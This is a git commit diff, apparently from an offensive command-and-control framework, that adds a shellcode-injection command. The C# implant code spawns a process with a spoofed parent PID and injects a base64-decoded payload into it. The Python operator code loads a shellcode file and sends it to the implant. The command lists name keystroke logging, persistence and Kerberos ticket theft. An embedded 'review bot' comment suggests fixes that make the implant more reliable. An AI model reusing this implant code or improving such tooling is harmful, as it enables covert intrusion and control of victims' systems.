Added Inject-Shellcode

chunking
benpturner 2018-12-28 22:59:54 +00:00
parent 9fa1e7636f
commit 86f58cf14e
3 changed files with 32 additions and 21 deletions


@ -392,26 +392,20 @@ public class Program
if (c.ToLower().StartsWith("inject-shellcode")){
string migrate = Regex.Replace(c, "inject-shellcode ", "", RegexOptions.IgnoreCase);
migrate = Regex.Replace(migrate, "inject-shellcode", "", RegexOptions.IgnoreCase);
if (!String.IsNullOrEmpty(migrate)) {
Program.proc = migrate;
string newProc = Regex.Replace(c, "inject-shellcode ", "", RegexOptions.IgnoreCase);
newProc = Regex.Replace(newProc, "inject-shellcode", "", RegexOptions.IgnoreCase);
if (!String.IsNullOrEmpty(newProc) && newProc.Length > 5) {
Program.proc = newProc;
}
output = scode + Program.proc;
object[] args = new object[3];
args[0] = null; // parent process id
args[1] = @"c:\windows\system32\netsh.exe"; //process name
args[2] = true; //suspended?
var stringOutput = new StringWriter();
Console.SetOut(stringOutput);
byte[] payload = Convert.FromBase64String(Program.scode);
var loadedType = LoadSomething("ProcHandler, Inject, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null");
var xxx = loadedType.Assembly.GetType("ProcHandler").InvokeMember("GetProcesses", BindingFlags.InvokeMethod, null, null, null);
output = xxx.ToString();
// OpenProcess
// VirtualAllocEx
// WriteProcessMemory
// CreateRemoteThread
var loadedType = LoadSomething("PPIDSpoofer, Inject, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null");
uint procID = (uint)loadedType.Assembly.GetType("PPIDSpoofer").InvokeMember("SharpCreateProcess", BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { null, Program.proc, true}, null, null, null);
var procShellcode = loadedType.Assembly.GetType("PPIDSpoofer").InvokeMember("InjectShellcode", BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { (int)procID, payload}, null, null, null);
output = stringOutput.ToString();
}
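Review bot: `Console.SetOut(stringOutput)` on line 28 redirects the process's console output and nothing in this branch ever restores it, so after the first inject-shellcode command every later `Console.Write` in the implant lands in that `StringWriter` (which is also never disposed); whether or not lines 27–28 predate this commit, the new `output = stringOutput.ToString()` is their only consumer. Capture `TextWriter previousOut = Console.Out;` before the redirect and wrap the `LoadSomething`/`InvokeMember` calls so that `finally { Console.SetOut(previousOut); stringOutput.Dispose(); }` always runs, which also stops an exception from either reflection call from leaving the console redirected. `newProc.Length > 5` is an unexplained threshold — a short comment or a named constant such as `MinProcessPathLength` would say what it guards — and `procShellcode` is assigned but never read. The enclosing method starts before this hunk.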


@ -47,6 +47,7 @@ listmodule
run-dll Seatbelt.Program Seatbelt UserChecks
run-exe Rubeus.Program Rubeus asktgt /user:test /rc4:fdfdsfdsfds
start-process net -argumentlist users
inject-shellcode
kill-implant
hide-implant
unhide-implant
@ -388,4 +389,4 @@ COMMANDS += ['invoke-psexecdaisypayload','invoke-wmidaisypayload', 'invoke-dcomd
UXCOMMANDS = ["unhide-implant","hide-implant","help","searchhelp","python","loadmodule","loadmoduleforce","get-keystrokes","back","upload-file","download-file","install-persistence","remove-persistence","sai","startanotherimplant-keepfile","get-screenshot","startanotherimplant","pwd","id","ps","setbeacon","kill-implant"]
SHARPCOMMANDS = ["unhide-implant","ls","pwd","dir","start-process","run-exe","run-dll","hide-implant","help","searchhelp","listmodules","loadmodule","loadmoduleforce","back","ps","beacon","setbeacon","kill-implant"]
SHARPCOMMANDS = ["unhide-implant","ls","pwd","dir","inject-shellcode","start-process","run-exe","run-dll","hide-implant","help","searchhelp","listmodules","loadmodule","loadmoduleforce","back","ps","beacon","setbeacon","kill-implant"]


@ -506,6 +506,22 @@ def runcommand(command, randomuri):
elif "hide-implant" in command.lower():
kill_implant(randomuri)
elif "inject-shellcode" in command.lower():
check_module_loaded("Inject.dll", randomuri)
readline.set_completer(filecomplete)
path = raw_input("Location of shellcode file: ")
t = tabCompleter()
t.createListCompleter(COMMANDS)
readline.set_completer(t.listCompleter)
try:
shellcodefile = load_file(path)
if shellcodefile != None:
arch = "64"
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), randomuri)
new_task(command, randomuri)
except Exception as e:
print ("Error loading file: %s" % e)
elif "kill-implant" in command.lower() or "exit" in command.lower():
impid = get_implantdetails(randomuri)
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])